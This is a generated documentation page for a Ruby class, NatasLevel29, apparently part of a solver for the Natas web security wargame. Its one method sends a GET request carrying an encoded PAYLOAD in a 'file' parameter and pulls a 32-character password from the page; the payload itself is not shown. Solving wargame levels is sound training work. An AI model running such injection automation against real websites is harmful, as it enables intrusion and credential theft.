class NatasLevel29

Level 29

Constants

LEVEL
PAGE
PAYLOAD

Public Instance Methods

exec() click to toggle source
# File lib/natas.rb, line 850
def exec
  data = get("#{PAGE}?file=#{URI.encode_www_form_component(PAYLOAD)}").body
  match = %r(</html>\n(\w{32})).match(data)
  not_found unless match
  found(match[1])
end